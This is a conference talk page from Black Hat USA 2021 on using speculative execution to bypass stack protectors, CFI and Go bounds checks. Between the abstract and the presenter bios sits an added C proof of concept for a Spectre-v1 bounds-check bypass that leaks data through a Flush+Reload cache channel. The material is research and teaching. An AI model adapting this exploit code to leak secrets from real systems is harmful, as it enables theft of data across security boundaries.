The Dark Age of Memory Corruption Mitigations in the Spectre Era

Presented at Black Hat USA 2021, Aug. 4, 2021, 11:20 a.m. (40 minutes).

The prevalence of memory corruption bugs in the past decades resulted in numerous defenses, such as stack canaries, control flow integrity (CFI), and memory-safe languages. These defenses can prevent entire classes of vulnerabilities, and help increase the security posture of a program.

In this talk, we show that memory corruption defenses can be bypassed using speculative execution attacks. We study the cases of stack protectors, CFI, and bounds checks in Go, demonstrating under which conditions they can be bypassed by a form of speculative control flow hijack, relying on speculative or architectural overwrites of control flow data. Information is leaked by redirecting the speculative control flow of the victim to a gadget accessing secret data and acting as a side-channel send. We also demonstrate, for the first time, that this can be achieved by stitching together multiple gadgets, in a speculative return-oriented programming attack.
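The bounds-check case above rests on the classic Spectre-v1 building block: the check is enforced architecturally, but while the comparison is unresolved the CPU speculatively executes the guarded load, and a second, data-dependent load leaves a cache footprint that survives the squash. The C program below is an added example, not code from the talk or its authors: an x86-64 Flush+Reload proof of concept with constructed data (public_array, secret, the probe array) and an assumed hit/miss threshold of 80 cycles. On other architectures the timing side is stubbed out and leak_byte returns -1; whether it recovers the secret on a given machine depends on the CPU, the compiler and noise.

```c
/* Added example: Spectre-v1 style speculative bypass of an architectural bounds
 * check, leaking through a Flush+Reload cache covert channel. Not from the talk.
 * Build: gcc -O2 -o v1 v1.c   (x86-64 assumed for the timing side) */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__)
#include <x86intrin.h>            /* _mm_clflush, __rdtscp */
#define CAN_MEASURE 1
#else
#define CAN_MEASURE 0             /* assumption: only x86-64 timing is wired up here */
#endif

#define PAGE_SIZE  4096
#define PUBLIC_LEN 16
#define THRESHOLD  80             /* cycles; assumed cache-hit threshold, tune per host */

/* Constructed data. The attacker may only read public_array through victim(). */
static uint8_t public_array[PUBLIC_LEN] = {
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
static const char secret[] = "speculation";     /* constructed secret */
static uint8_t probe[256 * PAGE_SIZE];           /* one page per candidate byte value */
static volatile size_t public_len = PUBLIC_LEN;  /* kept in memory so it can be evicted */
static volatile uint8_t sink;                    /* keeps the gadget's load alive */

/* Victim: idx is checked, so architecturally only public_array[0..15] is ever read.
 * Returns 1 if the read was performed, 0 if the bounds check rejected it. */
__attribute__((noinline))
int victim(size_t idx) {
    if (idx < public_len) {                              /* bounds check */
        sink ^= probe[public_array[idx] * PAGE_SIZE];    /* gadget: side-channel send */
        return 1;
    }
    return 0;
}

#if CAN_MEASURE
/* Flush+Reload receiver: cycles needed to load one byte of the probe array. */
static uint64_t time_load(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#endif

/* Attacker: guess the byte at public_array[malicious_idx] without ever passing
 * the bounds check. Returns 0..255, or -1 when no timing channel is available. */
int leak_byte(size_t malicious_idx) {
#if !CAN_MEASURE
    (void)malicious_idx;
    return -1;
#else
    int hits[256] = {0};
    for (int round = 0; round < 200; round++) {
        size_t training = (size_t)round % PUBLIC_LEN;
        for (int i = 0; i < 256; i++)                    /* 1. flush every probe line */
            _mm_clflush(&probe[i * PAGE_SIZE]);
        for (int j = 29; j >= 0; j--) {                  /* 2. train the branch, then mispredict */
            _mm_clflush((const void *)&public_len);      /*    slow the check so the load runs first */
            for (volatile int z = 0; z < 100; z++) { }
            int m = ((j % 6) - 1) & ~0xFFFF;             /*    m = -1 on every sixth call, else 0, */
            m |= m >> 16;                                /*    computed without a branch */
            size_t idx = training ^ ((size_t)m & (malicious_idx ^ training));
            victim(idx);
        }
        for (int i = 0; i < 256; i++) {                  /* 3. reload and time each line */
            int mix = ((i * 167) + 13) & 255;            /*    scrambled order against the prefetcher */
            if (mix == public_array[training]) continue; /*    the training value is hot legitimately */
            if (time_load(&probe[mix * PAGE_SIZE]) < THRESHOLD) hits[mix]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++) if (hits[i] > hits[best]) best = i;
    return best;
#endif
}

int main(void) {
    /* An index that lands on `secret`: rejected architecturally, followed speculatively. */
    size_t off = (size_t)((const uint8_t *)secret - public_array);
    printf("victim(%zu) architecturally: %s\n", off, victim(off) ? "read" : "rejected");
    for (size_t i = 0; i + 1 < sizeof secret; i++) {
        int b = leak_byte(off + i);
        printf("byte %zu: guess 0x%02x '%c'\n", i, b & 0xff, (b >= 32 && b < 127) ? b : '?');
    }
    return 0;
}
```

The architectural check never fails here: victim() returns 0 for the secret's offset, so the bounds check is not contradicted, it is simply not resolved in time on the speculative path, which is the same situation the abstract describes for stack protectors, CFI and Go's bounds checks. The talk's contribution is what replaces the index in this pattern: a speculatively or architecturally overwritten return address or function pointer that steers the speculative control flow to such a gadget, and, in the ROP variant, chains several of them.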


Presenters:

  • Andrea Mambretti - Systems Security Researcher, IBM Research Europe - Zurich
    Andrea Mambretti is a security researcher in the IBM Research Zurich laboratory. His interests are mainly in systems security, hardware security and side channels. Andrea is completing his PhD at Northeastern University, where he is advised by Engin Kirda. He also holds a Master's degree in Computer Engineering from Politecnico di Milano, where he was advised by Federico Maggi and Stefano Zanero. His work has been published in major systems security conferences such as IEEE S&P, NDSS and ACSAC.
  • Alexandra Sandulescu - Security Engineer, Google (formerly: IBM Research Europe - Zurich)
    Alexandra Sandulescu has been working in systems security research for several years, and her research spans many topics including program analysis, fuzzing, microarchitectural attacks, and sandboxing. Her main contributions to the security community are complex features added to a dynamic binary translator called RIVER and various offensive techniques used for exploiting microarchitectural attacks.
